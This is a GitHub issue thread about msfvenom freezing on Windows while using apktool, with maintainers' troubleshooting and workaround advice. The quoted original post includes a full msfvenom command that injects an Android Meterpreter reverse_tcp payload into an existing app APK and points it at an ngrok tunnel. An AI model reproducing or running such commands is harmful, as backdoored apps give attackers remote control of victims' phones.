-
Notifications
You must be signed in to change notification settings - Fork 671
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
msfvenom on Windows hangs using apktool #543
Comments
|
@bcoles How can I make the apktool be in my path? |
Please explain what to do |
So do you mean I will download the apktool on my system? |
@bcoles I solved the apktool issue after making some researches. But I have another issue ongoing. I'm trying to add payload to an apk file. I followed the normal command format and processed the command in the CMD. This is what I got:
And after that, nothing more... the command prompt it still processing (still blinking the white dash) Please why is this happening? Please help! |
what command did you use |
I used this:
|
@bcoles @adfoster-r7 what do you think happened? |
@bcoles I'm seriously waiting on your response please |
Freezes for me too. Tested on Windows 11. Pressing ctrl+c simply prints It is freezing when attempting to execute Looks like a dupe of rapid7/metasploit-framework#15219 which is a dupe of rapid7/metasploit-framework#13289. |
There's a legitimate bug here. But I'm not sure when/if it will be fixed. As it seems you're in a hurry, the fastest approach would be to install Metasploit on a Linux system. A huge portion of users use Kali Linux. Kali is most likely the most thoroughly tested Linux system for using Metasploit. You can install Kali in a virtual machine on Windows using VirtualBox or VMware Player. |
A simple workaround is to
However, I still suggest using Linux. If you do want to use Windows, you'll also have to set up |
Hello, someone should please help me out! I want to create a payload on my command prompt. I entered:
C:\users\USER\Downloads>msfvenom -× mymtnapp.apk -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=(port number) -o /users/USER/Desktop/mycreation.apk
I got an error message saying: apktool not found........
Why is this happening?
Originally posted by @Samshow-cyber in rapid7/metasploit-framework#11024 (comment)
The text was updated successfully, but these errors were encountered: